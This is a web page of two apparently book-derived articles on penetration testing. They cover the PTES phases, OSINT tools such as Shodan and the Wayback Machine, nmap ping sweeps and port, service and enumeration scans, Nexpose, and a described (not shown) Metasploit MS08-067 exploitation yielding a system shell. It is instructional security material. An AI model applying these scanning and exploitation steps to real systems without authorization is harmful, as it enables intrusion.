"In God I trust, all others I pen-test" - Binoj Koshy, cyber security expert In this article by Nipun Jaswal, authors of Mastering Metasploit, Second Edition, we will discuss penetration testing, which is an intentional attack on a computer-based system with the intension of finding vulnerabilities, figuring out security weaknesses, certifying that a system is secure, and gaining access to the system by exploiting these vulnerabilities. A penetration test will advise an organization if it is vulnerable to an attack, whether the implemented security is enough to oppose any attack, which security controls can be bypassed, and so on. Hence, a penetration test focuses on improving the security of an organization. (For more resources related to this topic, see here.) Achieving success in a penetration test largely depends on using the right set of tools and techniques. A penetration tester must choose the right set of tools and methodologies in order to complete a test. While talking about the best tools for penetration testing, the first one that comes to mind is Metasploit. It is considered one of the most effective auditing tools to carry out penetration testing today. Metasploit offers a wide variety of exploits, an extensive exploit development environment, information gathering and web testing capabilities, and much more. This article has been written so that it will not only cover the frontend perspectives of Metasploit, but it will also focus on the development and customization of the framework as well. This article assumes that the reader has basic knowledge of the Metasploit framework. However, some of the sections of this article will help you recall the basics as well. While covering Metasploit from the very basics to the elite level, we will stick to a step-by-step approach, as shown in the following diagram: This article will help you recall the basics of penetration testing and Metasploit, which will help you warm up to the pace of this article. In this article, you will learn about the following topics: The phases of a penetration test The basics of the Metasploit framework The workings of exploits Testing a target network with Metasploit The benefits of using databases An important point to take a note of here is that we might not become an expert penetration tester in a single day. It takes practice, familiarization with the work environment, the ability to perform in critical situations, and most importantly, an understanding of how we have to cycle through the various stages of a penetration test. When we think about conducting a penetration test on an organization, we need to make sure that everything is set perfectly and is according to a penetration test standard. Therefore, if you feel you are new to penetration testing standards or uncomfortable with the term Penetration testing Execution Standard (PTES), please refer to http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines to become more familiar with penetration testing and vulnerability assessments. According to PTES, the following diagram explains the various phases of a penetration test: Refer to the http://www.pentest-standard.org website to set up the hardware and systematic phases to be followed in a work environment; these setups are required to perform a professional penetration test. Organizing a penetration test Before we start firing sophisticated and complex attack vectors with Metasploit, we must get ourselves comfortable with the work environment. Gathering knowledge about the work environment is a critical factor that comes into play before conducting a penetration test. Let us understand the various phases of a penetration test before jumping into Metasploit exercises and see how to organize a penetration test on a professional scale. Preinteractions The very first phase of a penetration test, preinteractions, involves a discussion of the critical factors regarding the conduct of a penetration test on a client's organization, company, institute, or network; this is done with the client. This serves as the connecting line between the penetration tester and the client. Preinteractions help a client get enough knowledge on what is about to be done over his or her network/domain or server. Therefore, the tester will serve here as an educator to the client. The penetration tester also discusses the scope of the test, all the domains that will be tested, and any special requirements that will be needed while conducting the test on the client's behalf. This includes special privileges, access to critical systems, and so on. The expected positives of the test should also be part of the discussion with the client in this phase. As a process, preinteractions discuss some of the following key points: Scope: This section discusses the scope of the project and estimates the size of the project. Scope also defines what to include for testing and what to exclude from the test. The tester also discusses ranges and domains under the scope and the type of test (black box or white box) to be performed. For white box testing, what all access options are required by the tester? Questionnaires for administrators, the time duration for the test, whether to include stress testing or not, and payment for setting up the terms and conditions are included in the scope. A general scope document provides answers to the following questions: What are the target organization's biggest security concerns? What specific hosts, network address ranges, or applications should be tested? What specific hosts, network address ranges, or applications should explicitly NOT be tested? Are there any third parties that own systems or networks that are in the scope, and which systems do they own (written permission must have been obtained in advance by the target organization)? Will the test be performed against a live production environment or a test environment? Will the penetration test include the following testing techniques: ping sweep of network ranges, port scan of target hosts, vulnerability scan of targets, penetration of targets, application-level manipulation, client-side Java/ActiveX reverse engineering, physical penetration attempts, social engineering? Will the penetration test include internal network testing? If so, how will access be obtained? Are client/end-user systems included in the scope? If so, how many clients will be leveraged? Is social engineering allowed? If so, how may it be used? Are Denial of Service attacks allowed? Are dangerous checks/exploits allowed? Goals: This section discusses various primary and secondary goals that a penetration test is set to achieve. The common questions related to the goals are as follows: What is the business requirement for this penetration test? This is required by a regulatory audit or standard Proactive internal decision to determine all weaknesses What are the objectives? Map out vulnerabilities Demonstrate that the vulnerabilities exist Test the incident response Actual exploitation of a vulnerability in a network, system, or application All of the above Testing terms and definitions: This section discusses basic terminologies with the client and helps him or her understand the terms well Rules of engagement: This section defines the time of testing, timeline, permissions to attack, and regular meetings to update the status of the ongoing test. The common questions related to rules of engagement are as follows: At what time do you want these tests to be performed? During business hours After business hours Weekend hours During a system maintenance window Will this testing be done on a production environment? If production environments should not be affected, does a similar environment (development and/or test systems) exist that can be used to conduct the penetration test? Who is the technical point of contact? For more information on preinteractions, refer to http://www.pentest-standard.org/index.php/File:Pre-engagement.png. Intelligence gathering / reconnaissance phase In the intelligence-gathering phase, you need to gather as much information as possible about the target network. The target network could be a website, an organization, or might be a full-fledged fortune company. The most important aspect is to gather information about the target from social media networks and use Google Hacking (a way to extract sensitive information from Google using specialized queries) to find sensitive information related to the target. Footprinting the organization using active and passive attacks can also be an approach. The intelligence phase is one of the most crucial phases in penetration testing. Properly gained knowledge about the target will help the tester to stimulate appropriate and exact attacks, rather than trying all possible attack mechanisms; it will also help him or her save a large amount of time as well. This phase will consume 40 to 60 percent of the total time of the testing, as gaining access to the target depends largely upon how well the system is foot printed. It is the duty of a penetration tester to gain adequate knowledge about the target by conducting a variety of scans, looking for open ports, identifying all the services running on those ports and to decide which services are vulnerable and how to make use of them to enter the desired system. The procedures followed during this phase are required to identify the security policies that are currently set in place at the target, and what we can do to breach them. Let us discuss this using an example. Consider a black box test against a web server where the client wants to perform a network stress test. Here, we will be testing a server to check what level of bandwidth and resource stress the server can bear or in simple terms, how the server is responding to the Denial of Service (DoS) attack. A DoS attack or a stress test is the name given to the procedure of sending indefinite requests or data to a server in order to check whether the server is able to handle and respond to all the requests successfully or crashes causing a DoS. A DoS can also occur if the target service is vulnerable to specially crafted requests or packets. In order to achieve this, we start our network stress-testing tool and launch an attack towards a target website. However, after a few seconds of launching the attack, we see that the server is not responding to our browser and the website does not open. Additionally, a page shows up saying that the website is currently offline. So what does this mean? Did we successfully take out the web server we wanted? Nope! In reality, it is a sign of protection mechanism set by the server administrator that sensed our malicious intent of taking the server down, and hence resulting in a ban of our IP address. Therefore, we must collect correct information and identify various security services at the target before launching an attack. The better approach is to test the web server from a different IP range. Maybe keeping two to three different virtual private servers for testing is a good approach. In addition, I advise you to test all the attack vectors under a virtual environment before launching these attack vectors onto the real targets. A proper validation of the attack vectors is mandatory because if we do not validate the attack vectors prior to the attack, it may crash the service at the target, which is not favorable at all. Network stress tests should generally be performed towards the end of the engagement or in a maintenance window. Additionally, it is always helpful to ask the client for white listing IP addresses used for testing. Now let us look at the second example. Consider a black box test against a windows 2012 server. While scanning the target server, we find that port 80 and port 8080 are open. On port 80, we find the latest version of Internet Information Services (IIS) running while on port 8080, we discover that the vulnerable version of the Rejetto HFS Server is running, which is prone to the Remote Code Execution flaw. However, when we try to exploit this vulnerable version of HFS, the exploit fails. This might be a common scenario where inbound malicious traffic is blocked by the firewall. In this case, we can simply change our approach to connecting back from the server, which will establish a connection from the target back to our system, rather than us connecting to the server directly. This may prove to be more successful as firewalls are commonly being configured to inspect ingress traffic rather than egress traffic. Coming back to the procedures involved in the intelligence-gathering phase when viewed as a process are as follows: Target selection: This involves selecting the targets to attack, identifying the goals of the attack, and the time of the attack. Covert gathering: This involves on-location gathering, the equipment in use, and dumpster diving. In addition, it covers off-site gathering that involves data warehouse identification; this phase is generally considered during a white box penetration test. Foot printing: This involves active or passive scans to identify various technologies used at the target, which includes port scanning, banner grabbing, and so on. Identifying protection mechanisms: This involves identifying firewalls, filtering systems, network- and host-based protections, and so on. For more information on gathering intelligence, refer to http://www.pentest-standard.org/index.php/Intelligence_Gathering Predicting the test grounds A regular occurrence during penetration testers' lives is when they start testing an environment, they know what to do next. If they come across a Windows box, they switch their approach towards the exploits that work perfectly for Windows and leave the rest of the options. An example of this might be an exploit for the NETAPI vulnerability, which is the most favorable choice for exploiting a Windows XP box. Suppose a penetration tester needs to visit an organization, and before going there, they learn that 90 percent of the machines in the organization are running on Windows XP, and some of them use Windows 2000 Server. The tester quickly decides that they will be using the NETAPI exploit for XP-based systems and the DCOM exploit for Windows 2000 server from Metasploit to complete the testing phase successfully. However, we will also see how we can use these exploits practically in the latter section of this article. Consider another example of a white box test on a web server where the server is hosting ASP and ASPX pages. In this case, we switch our approach to use Windows-based exploits and IIS testing tools, therefore ignoring the exploits and tools for Linux. Hence, predicting the environment under a test helps to build the strategy of the test that we need to follow at the client's site. For more information on the NETAPI vulnerability, visit http://technet.microsoft.com/en-us/security/bulletin/ms08-067. For more information on the DCOM vulnerability, visit http://www.rapid7.com/db/modules/exploit/Windows /dcerpc/ms03_026_dcom. Modeling threats In order to conduct a comprehensive penetration test, threat modeling is required. This phase focuses on modeling out correct threats, their effect, and their categorization based on the impact they can cause. Based on the analysis made during the intelligence-gathering phase, we can model the best possible attack vectors. Threat modeling applies to business asset analysis, process analysis, threat analysis, and threat capability analysis. This phase answers the following set of questions: How can we attack a particular network? To which crucial sections do we need to gain access? What approach is best suited for the attack? What are the highest-rated threats? Modeling threats will help a penetration tester to perform the following set of operations: Gather relevant documentation about high-level threats Identify an organization's assets on a categorical basis Identify and categorize threats Mapping threats to the assets of an organization Modeling threats will help to define the highest priority assets with threats that can influence these assets. Now, let us discuss a third example. Consider a black box test against a company's website. Here, information about the company's clients is the primary asset. It is also possible that in a different database on the same backend, transaction records are also stored. In this case, an attacker can use the threat of a SQL injection to step over to the transaction records database. Hence, transaction records are the secondary asset. Mapping a SQL injection attack to primary and secondary assets is achievable during this phase. Vulnerability scanners such as Nexpose and the Pro version of Metasploit can help model threats clearly and quickly using the automated approach. This can prove to be handy while conducting large tests. For more information on the processes involved during the threat modeling phase, refer to http://www.pentest-standard.org/index.php/Threat_Modeling. Vulnerability analysis Vulnerability analysis is the process of discovering flaws in a system or an application. These flaws can vary from a server to web application, an insecure application design for vulnerable database services, and a VOIP-based server to SCADA-based services. This phase generally contains three different mechanisms, which are testing, validation, and research. Testing consists of active and passive tests. Validation consists of dropping the false positives and confirming the existence of vulnerabilities through manual validations. Research refers to verifying a vulnerability that is found and triggering it to confirm its existence. For more information on the processes involved during the threat-modeling phase, refer to http://www.pentest-standard.org/index.php/Vulnerability_Analysis. Exploitation and post-exploitation The exploitation phase involves taking advantage of the previously discovered vulnerabilities. This phase is considered as the actual attack phase. In this phase, a penetration tester fires up exploits at the target vulnerabilities of a system in order to gain access. This phase is covered heavily throughout the article. The post-exploitation phase is the latter phase of exploitation. This phase covers various tasks that we can perform on an exploited system, such as elevating privileges, uploading/downloading files, pivoting, and so on. For more information on the processes involved during the exploitation phase, refer to http://www.pentest-standard.org/index.php/Exploitation. For more information on post exploitation, refer to http://www.pentest-standard.org/index.php/Post_Exploitation. Reporting Creating a formal report of the entire penetration test is the last phase to conduct while carrying out a penetration test. Identifying key vulnerabilities, creating charts and graphs, recommendations, and proposed fixes are a vital part of the penetration test report. An entire section dedicated to reporting is covered in the latter half of this article. For more information on the processes involved during the threat modeling phase, refer to http://www.pentest-standard.org/index.php/Reporting. Mounting the environment Before going to a war, the soldiers must make sure that their artillery is working perfectly. This is exactly what we are going to follow. Testing an environment successfully depends on how well your test labs are configured. Moreover, a successful test answers the following set of questions: How well is your test lab configured? Are all the required tools for testing available? How good is your hardware to support such tools? Before we begin to test anything, we must make sure that all the required set of tools are available and that everything works perfectly. Summary Throughout this article, we have introduced the phases involved in penetration testing. We have also seen how we can set up Metasploit and conduct a black box test on the network. We recalled the basic functionalities of Metasploit as well. We saw how we could perform a penetration test on two different Linux boxes and Windows Server 2012. We also looked at the benefits of using databases in Metasploit. After completing this article, we are equipped with the following: Knowledge of the phases of a penetration test The benefits of using databases in Metasploit The basics of the Metasploit framework Knowledge of the workings of exploits and auxiliary modules Knowledge of the approach to penetration testing with Metasploit The primary goal of this article was to inform you about penetration test phases and Metasploit. We will dive into the coding part of Metasploit and write our custom functionalities to the Metasploit framework. Resources for Article: Further resources on this subject: Introducing Penetration Testing [article] Open Source Intelligence [article] Ruby and Metasploit Modules [article]
Read more
  • 0
  • 0
  • 8450
article-image-introducing-penetration-testing
Packt
07 Sep 2016
28 min read
Save for later

Introducing Penetration Testing

Packt
07 Sep 2016
28 min read
In this article by Kevin Cardwell, the author of the book Building Virtual Pentesting Labs for Advanced Penetration Testing, we will discuss the role that pen testing plays in the professional security testing framework. We will discuss the following topics: Defining security testing An abstract security testing methodology Myths and misconceptions about pen testing (For more resources related to this topic, see here.) If you have been doing penetration testing for some time and are very familiar with the methodology and concept of professional security testing, you can skip this article or just skim it. But you might learn something new or at least a different approach to penetration testing. We will establish some fundamental concepts in this article. Security testing If you ask 10 consultants to define what security testing is today, you will more than likely get a variety of responses. Here is the Wikipedia definition: "Security testing is a process and methodology to determine that an information system protects and maintains functionality as intended." In my opinion, this is the most important aspect of penetration testing. Security is a process and not a product. I'd also like to add that it is a methodology and not a product. Another component to add to our discussion is the point that security testing takes into account the main areas of a security model. A sample of this is as follows: Authentication Authorization Confidentiality Integrity Availability Non-repudiation Each one of these components has to be considered when an organization is in the process of securing their environment. Each one of these areas in itself has many subareas that also have to be considered when it comes to building a secure architecture. The lesson is that when testing security, we have to address each of these areas. Authentication It is important to note that almost all systems and/or networks today have some form of authentication and, as such, it is usually the first area we secure. This could be something as simple as users selecting a complex password or us adding additional factors to authentication, such as a token, biometrics, or certificates. No single factor of authentication is considered to be secure by itself in today's networks. Authorization Authorization is often overlooked since it is assumed and not a component of some security models. That is one approach to take, but it's preferred to include it in most testing models, as the concept of authorization is essential since it is how we assign the rights and permissions to access a resource, and we would want to ensure it is secure. Authorization enables us to have different types of users with separate privilege levels coexist within a system. We do this when we have the concept of discretionary access, where a user can have administrator privileges on a machine or assume the role of an administrator to gain additional rights or permissions, whereas we might want to provide limited resource access to a contractor. Confidentiality Confidentiality is the assurance that something we want to be protected on the machine or network is safe and not at risk of being compromised. This is made harder by the fact that the protocol (TCP/IP) running the Internet today is a protocol that was developed in the early 1970s. At that time, the Internet consisted of just a few computers, and now, even though the Internet has grown to the size it is today, we are still running the same protocol from those early days. This makes it more difficult to preserve confidentiality. It is important to note that when the developers created the protocol and the network was very small, there was an inherent sense of trust on who you could potentially be communicating with. This sense of trust is what we continue to fight from a security standpoint today. The concept from that early creation was and still is that you can trust data received to be from a reliable source. We know now that the Internet is at this huge size and that is definitely not the case. Integrity Integrity is similar to confidentiality, in that we are concerned with the compromising of information. Here, we are concerned with the accuracy of data and the fact that it is not modified in transit or from its original form. A common way of doing this is to use a hashing algorithm to validate that the file is unaltered. Availability One of the most difficult things to secure is availability, that is, the right to have a service when required. The irony of availability is that a particular resource is available to one user, and it is later available to all. Everything seems perfect from the perspective of an honest/legitimate user. However, not all users are honest/legitimate, and due to the sheer fact that resources are finite, they can be flooded or exhausted; hence, is it is more difficult to protect this area. Non-repudiation Non-repudiation makes the claim that a sender cannot deny sending something after the fact. This is the one I usually have the most trouble with, because a computer system can be compromised and we cannot guarantee that, within the software application, the keys we are using for the validation are actually the ones being used. Furthermore, the art of spoofing is not a new concept. With these facts in our minds, the claim that we can guarantee the origin of a transmission by a particular person from a particular computer is not entirely accurate. Since we do not know the state of the machine with respect to its secureness, it would be very difficult to prove this concept in a court of law. All it takes is one compromised machine, and then the theory that you can guarantee the sender goes out the window. We won't cover each of the components of security testing in detail here, because that is beyond the scope of what we are trying to achieve. The point I want to get across in this article is that security testing is the concept of looking at each and every one of these and other components of security, addressing them by determining the amount of risk an organization has from them, and then mitigating that risk. An abstract testing methodology As mentioned previously, we concentrate on a process and apply that to our security components when we go about security testing. For this, I'll describe an abstract methodology here. We will define our testing methodology as consisting of the following steps: Planning Nonintrusive target search Intrusive target search Data analysis Reporting Planning Planning is a crucial step of professional testing. But, unfortunately, it is one of the steps that is rarely given the time that is essentially required. There are a number of reasons for this, but the most common one is the budget: clients do not want to provide consultants days and days to plan their testing. In fact, planning is usually given a very small portion of the time in the contract due to this reason. Another important point about planning is that a potential adversary is going to spend a lot of time on it. There are two things we should tell clients with respect to this step that as a professional tester we cannot do but an attacker could: 6 to 9 months of planning: The reality is that a hacker who targets someone is going to spend a lot of time before the actual attack. We cannot expect our clients to pay us for 6 to 9 months of work just to search around and read on the Internet. Break the law: We could break the law and go to jail, but it is not something that is appealing for most. Additionally, being a certified hacker and licensed penetration tester, you are bound to an oath of ethics, and you can be pretty sure that breaking the law while testing is a violation of this code of ethics. Nonintrusive target search There are many names that you will hear for nonintrusive target search. Some of these are open source intelligence, public information search, and cyber intelligence. Regardless of which name you use, they all come down to the same thing: using public resources to extract information about the target or company you are researching. There is a plethora of tools that are available for this. We will briefly discuss those tools to get an idea of the concept, and those who are not familiar with them can try them out on their own. Nslookup The nslookup tool can be found as a standard program in the majority of the operating systems we encounter. It is a method of querying DNS servers to determine information about a potential target. It is very simple to use and provides a great deal of information. Open a command prompt on your machine, and enter nslookup www.packtpub.com. This will result in output like the following screenshot:  As you can see, the response to our command is the IP address of the DNS server for the www.packtpub.com domain. If we were testing this site, we would have explored this further. Alternatively, we may also use another great DNS-lookup tool called dig. For now, we will leave it alone and move to the next resource. Central Ops The https://centralops.net/co/ website has a number of tools that we can use to gather information about a potential target. There are tools for IP, domains, name servers, e-mail, and so on. The landing page for the site is shown in the next screenshot: The first thing we will look at in the tool is the ability to extract information from a web server header page: click on TcpQuery, and in the window that opens, enter www.packtpub.com and click on Go. An example of the output from this is shown in the following screenshot: As the screenshot shows, the web server banner has been modified and says packt. If we do the query against the www.packtpub.com domain we have determined that the site is using the Apache web server, and the version that is running; however we have much more work to do in order to gather enough information to target this site. The next thing we will look at is the capability to review the domain server information. This is accomplished by using the domain dossier. Return to the main page, and in the Domain Dossier dialog box, enter yahoo.com and click on go. An example of the output from this is shown in the following screenshot:  There are many tools we could look at, but again, we just want to briefly acquaint ourselves with tools for each area of our security testing procedure. If you are using Windows and you open a command prompt window and enter tracert www.microsoft.com, you will observe that it fails, as indicated in this screenshot:  The majority of you reading this article probably know why this is blocked; for those of you who do not, it is because Microsoft has blocked the ICMP protocol, which is what the tracert command uses by default. It is simple to get past this because the server is running services; we can use those protocols to reach it, and in this case, that protocol is TCP. If you go to http://www.websitepulse.com/help/testtools.tcptraceroute-test.html and enter www.microsoft.com in the IP address/domain field with the default location and conduct the TCP Traceroute test, you will see it will now be successful, as shown in the following screenshot: As you can see, we now have additional information about the path to the potential target; moreover, we have additional machines to add to our target database as we conduct our test within the limits of the rules of engagement. The Wayback Machine The Wayback Machine is proof that nothing that has ever been on the Internet leaves! There have been many assessments in which a client informed the team that they were testing a web server that hadn't placed into production, and when they were shown the site had already been copied and stored, they were amazed that this actually does happen. I like to use the site to download some of my favorite presentations, tools, and so on, that have been removed from a site or, in some cases, whose site no longer exists. As an example, one of the tools used to show students the concept of steganography is the tool infostego. This tool was released by Antiy Labs, and it provided students an easy-to-use tool to understand the concepts. Well, if you go to their site at http://www.antiy.net/, you will find no mention of the tool—in fact, it will not be found on any of their pages. They now concentrate more on the antivirus market. A portion from their page is shown in the following screenshot: Now, let's try and use the power of the Wayback Machine to find our software. Open the browser of your choice and go to www.archive.org. The Wayback Machine is hosted there and can be seen in the following screenshot: As indicated, there are 491 billion pages archived at the time of writing this article. In the URL section, enter www.antiy.net and hit Enter. This will result in the site searching its archives for the entered URL. After a few moments, the results of the search will be displayed. An example of this is shown in the following screenshot: We know we don't want to access a page that has been recently archived, so to be safe, click on 2008. This will result in the calendar being displayed and showing all the dates in 2008 on which the site was archived. You can select any one that you want; an example of the archived site from December 18 is shown in the following screenshot: as you can see, the infostego tool is available, and you can even download it! Feel free to download and experiment with the tool if you like. Shodan The Shodan site is one of the most powerful cloud scanners available. You are required to register with the site to be able to perform the more advanced types of queries. To access the site, go to https://www.shodan.io/. It is highly recommended that you register, since the power of the scanner and the information you can discover is quite impressive, especially after registration. The page that is presented once you log in is shown in the following screenshot: The screenshot shows recently shared search queries as well as the most recent searches the logged-in user has conducted. This is another tool you should explore deeply if you do professional security testing. For now, we will look at one example and move on, since an entire article could be written just on this tool. If you are logged in as a registered user, you can enter iphone us into the search query window. This will return pages with iphone in the query and mostly in the United States, but as with any tool, there will be some hits on other sites as well. An example of the results of this search is shown in the following screenshot: Intrusive target search This is the step that starts the true hacker-type activity. This is when you probe and explore the target network; consequently, ensure that you have with you explicit written permission to carry out this activity. Never perform an intrusive target search without permission, as this written authorization is the only aspect which differentiates you and a malicious hacker. Without it, you are considered a criminal like them. Within this step, there are a number of components that further define the methodology. Find live systems No matter how good our skills are, we need to find systems that we can attack. This is accomplished by probing the network and looking for a response. One of the most popular tools to do this with is the excellent open source tool nmap, written by Fyodor. You can download nmap from https://nmap.org/, or you can use any number of toolkit distributions for the tool. We will use the exceptional penetration-testing framework Kali Linux. You can download the distribution from https://www.kali.org/. Regardless of which version of nmap you explore with, they all have similar, if not the same, command syntax. In a terminal window, or a command prompt window if you are running it on Windows, type nmap –sP <insert network IP address>. The network we are scanning is the 192.168.4.0/24 network; yours more than likely will be different. An example of this ping sweep command is shown in the following screenshot:  We now have live systems on the network that we can investigate further. For those of you who would like a GUI tool, you can use Zenmap. Discover open ports Now that we have live systems, we want to see what is open on these machines. A good analogy to a port is a door, and it's that if the door is open, I can approach it. There might be things that I have to do once I get to the door to gain access, but if it is open, then I know it is possible to get access, and if it is closed, then I know I cannot go through that door. Furthermore, we might need to know the type of lock that is on the door, because it might have weaknesses or additional protection that we need to know about. The same is with ports: if they are closed, then we cannot go into that machine using that port. We have a number of ways to check for open ports, and we will continue with the same theme and use nmap. We have machines that we have identified, so we do not have to scan the entire network as we did previously—we will only scan the machines that are up. Additionally, one of the machines found is our own machine; therefore, we will not scan ourselves—we could, but it's not the best plan. The targets that are live on our network are 1, 2, 16, and 18. We can scan these by entering nmap –sS 192.168.4.1,2,16,18. Those of you who want to learn more about the different types of scans can refer to http://nmap.org/book/man-port-scanning-techniques.html. Alternatively, you can use the nmap –h option to display a list of options. The first portion of the stealth scan (not completing the three-way handshake) result is shown in the following screenshot:   Discover services We now have live systems and openings that are on the machine. The next step is to determine what, if anything, is running on the ports we have discovered—it is imperative that we identify what is running on the machine so that we can use it as we progress deeper into our methodology. We once again turn to nmap. In most command and terminal windows, there is history available; hopefully, this is the case for you and you can browse through it with the up and down arrow keys on your keyboard. For our network, we will enter nmap –sV 192.168.4.1. From our previous scan, we've determined that the other machines have all scanned ports closed, so to save time, we won't scan them again. An example of this is shown in the following screenshot: From the results, you can now see that we have additional information about the ports that are open on the target. We could use this information to search the Internet using some of the tools we covered earlier, or we could let a tool do it for us. Enumeration Enumeration is the process of extracting more information about the potential target to include the OS, usernames, machine names, and other details that we can discover. The latest release of nmap has a scripting engine that will attempt to discover a number of details and in fact enumerate the system to some aspect. To process the enumeration with nmap, use the -A option. Enter nmap -A 192.168.4.1. Remember that you will have to enter your respective target address, which might be different from the one mentioned here. Also, this scan will take some time to complete and will generate a lot of traffic on the network. If you want an update, you can receive one at any time by pressing the spacebar. This command's output is quite extensive; so a truncated version is shown in the following screenshot:   As you can see, you have a great deal of information about the target, and you are quite ready to start the next phase of testing. Additionally, we have the OS correctly identified; until this step, we did not have that. Identify vulnerabilities After we have processed the steps up to this point, we have information about the services and versions of the software that are running on the machine. We could take each version and search the Internet for vulnerabilities, or we could use a tool—for our purposes, we will choose the latter. There are numerous vulnerability scanners out there in the market, and the one you select is largely a matter of personal preference. The commercial tools for the most part have a lot more information and details than the free and open source ones, so you will have to experiment and see which one you prefer. We will be using the Nexpose vulnerability scanner from Rapid7. There is a community version of their tool that will scan a limited number of targets, but it is worth looking into. You can download Nexpose from http://www.rapid7.com/. Once you have downloaded it, you will have to register, and you'll receive a key by e-mail to activate it. I will leave out the details of this and let you experience them on your own. Nexpose has a web interface, so once you have installed and started the tool, you have to access it. You can access it by entering https://localhost:3780. It seems to take an extraordinary amount of time to initialize, but eventually, it will present you with a login page, as shown in the following screenshot: The credentials required for login will have been created during the installation. It is quite an involved process to set up a scan, and since we are just detailing the process and there is an excellent quick start guide available, we will just move on to the results of the scan. We will have plenty of time to explore this area as the article progresses. The result of a typical scan is shown in the following screenshot: As you can see, the target machine is in bad shape. One nice thing about Nexpose is the fact that since they also own Metasploit, they will list the vulnerabilities that have a known exploit within Metasploit. Exploitation This is the step of the security testing that gets all the press, and it is, in simple terms, the process of validating a discovered vulnerability. It is important to note that it is not a 100-percent successful process—some vulnerabilities will not have exploits and some will have exploits for a certain patch level of the OS but not others. As I like to say, it is not an exact science and in reality is an infinitesimal part of professional security testing, but it is fun, so we will briefly look at the process. We also like to say in security testing that we have to validate and verify everything a tool reports to our client, and that is what we try to do with exploitation. The point is that you are executing a piece of code on a client's machine, and this code could cause damage. The most popular free tool for exploitation is the Rapid7-owned tool Metasploit. There are entire articles written on using the tool, so we will just look at the results of running it and exploiting a machine here. As a reminder, you have to have written permission to do this on any network other than your own; if in doubt, do not attempt it. Let's look at the options: There is quite a bit of information in the options. The one we will cover is the fact that we are using the exploit for the MS08-067 vulnerability, which is a vulnerability in the server service. It is one of the better ones to use as it almost always works and you can exploit it over and over again. If you want to know more about this vulnerability, you can check it out here: http://technet.microsoft.com/en-us/security/bulletin/ms08-067. Since the options are set, we are ready to attempt the exploit, and as indicated in the following screenshot, we are successful and have gained a shell on the target machine. The process for this we will cover as we progress through the article. For now, we will stop here. Here onward, it is only your imagination that can limit you. The shell you have opened is running at system privileges; therefore, it is the same as running a Command Prompt on any Windows machine with administrator rights, so whatever you can do in that shell, you can also do in this one. You can also do a number of other things, which you will learn as we progress through the article. Furthermore, with system access, we can plant code as malware: a backdoor or really anything we want. While we might not do that as a professional tester, a malicious hacker could do it, and this would require additional analysis to discover on the client's end. Data analysis Data analysis is often overlooked, and it can be a time-consuming process. This is the process that takes the most time to develop. Most testers can run tools and perform manual testing and exploitation, but the real challenge is taking all of the results and analyzing them. We will look at one example of this in the next screenshot. Take a moment and review the protocol analysis captured with the tool Wireshark—as an analyst, you need to know what the protocol analyzer is showing you. Do you know what exactly is happening? Do not worry, I will tell you after we have a look at the following screenshot: You can observe that the machine with the IP address 192.168.3.10 is replying with an ICMP packet that is type 3 code 13; in other words, the reason the packet is being rejected is because the communication is administratively filtered. Furthermore, this tells us that there is a router in place and it has an access control list (ACL) that is blocking the packet. Moreover, it tells us that the administrator is not following best practices— absorbing packets and not replying with any error messages that can assist an attacker. This is just a small example of the data analysis step; there are many things you will encounter and many more that you will have to analyze to determine what is taking place in the tested environment. Remember: the smarter the administrator, the more challenging pen testing can become—which is actually a good thing for security! Reporting Reporting is another one of the areas in testing that is often overlooked in training classes. This is unfortunate since it is one of the most important things you need to master. You have to be able to present a report of your findings to the client. These findings will assist them in improving their security practices, and if they like the report, it is what they will most often share with partners and other colleagues. This is your advertisement for what separates you from others. It is a showcase that not only do you know how to follow a systematic process and methodology of professional testing, you also know how to put it into an output form that can serve as a reference going forward for the clients. At the end of the day, as professional security testers, we want to help our clients improve their security scenario, and that is where reporting comes in. There are many references for reports, so the only thing we will cover here is the handling of findings. There are two components we use when it comes to findings, the first of which is a summary-of-findings table. This is so the client can reference the findings early on in the report. The second is the detailed findings section. This is where we put all of the information about the findings. We rate them according to severity and include the following: Description This is where we provide the description of the vulnerability, specifically, what it is and what is affected. Analysis and exposure For this article, you want to show the client that you have done your research and aren't just repeating what the scanning tool told you. It is very important that you research a number of resources and write a good analysis of what the vulnerability is, along with an explanation of the exposure it poses to the client site. Recommendations We want to provide the client a reference to the patches and measures to apply in order to mitigate the risk of discovered vulnerabilities. We never tell the client not to use the service and/or protocol! We do not know what their policy is, and it might be something they have to have in order to support their business. In these situations, it is our job as consultants to recommend and help the client determine the best way to either mitigate the risk or remove it. When a patch is not available, we should provide a reference to potential workarounds until one is available. References If there are references such as a Microsoft bulletin number or a Common Vulnerabilities and Exposures (CVE) number, this is where we would place them. Myths and misconceptions about pen testing After more than 20 years of performing professional security testing, it is amazing to me really how many are confused as to what a penetration test is. I have on many occasions gone to a meeting where the client is convinced they want a penetration test, and when I explain exactly what it is, they look at me in shock. So, what exactly is a penetration test? Remember our abstract methodology had a step for intrusive target searching and part of that step was another methodology for scanning? Well, the last item in the scanning methodology, exploitation, is the step that is indicative of a penetration test. That's right! That one step is the validation of vulnerabilities, and this is what defines penetration testing. Again, it is not what most clients think when they bring a team in. The majority of them in reality want a vulnerability assessment. When you start explaining to them that you are going to run exploit code and all these really cool things on their systems and/or networks, they usually are quite surprised. The majority of the times, the client will want you to stop at the validation step. On some occasions, they will ask you to prove what you have found, and then you might get to show validation. I once was in a meeting with the IT department of a foreign country's stock market, and when I explained what we were about to do for validating vulnerabilities, the IT director's reaction was, "Those are my stock broker records, and if we lose them, we lose a lot of money!" Hence, we did not perform the validation step in that test. Summary In this article, we defined security testing as it relates to this article, and we identified an abstract methodology that consists of the following steps: planning, nonintrusive target search, intrusive target search, data analysis, and reporting. More importantly, we expanded the abstract model when it came to intrusive target searching, and we defined within that a methodology for scanning. This consisted of identifying live systems, looking at open ports, discovering services, enumeration, identifying vulnerabilities, and finally, exploitation. Furthermore, we discussed what a penetration test is and that it is a validation of vulnerabilities and is associated with one step in our scanning methodology. Unfortunately, most clients do not understand that when you validate vulnerabilities, it requires you to run code that could potentially damage a machine or, even worse, damage their data. Because of this, once they discover this, most clients ask that it not be part of the test. We created a baseline for what penetration testing is in this article, and we will use this definition throughout the remainder of this article. In the next article, we will discuss the process of choosing your virtual environment.  Resources for Article:  Further resources on this subject: CISSP: Vulnerability and Penetration Testing for Access Control [article] Web app penetration testing in Kali [article] BackTrack 4: Security with Penetration Testing Methodology [article]
Read more
  • 0
  • 0
  • 3462

article-image-introducing-mobile-forensics
Packt
07 Sep 2016
21 min read
Save for later

Introducing Mobile Forensics

Packt
07 Sep 2016
21 min read
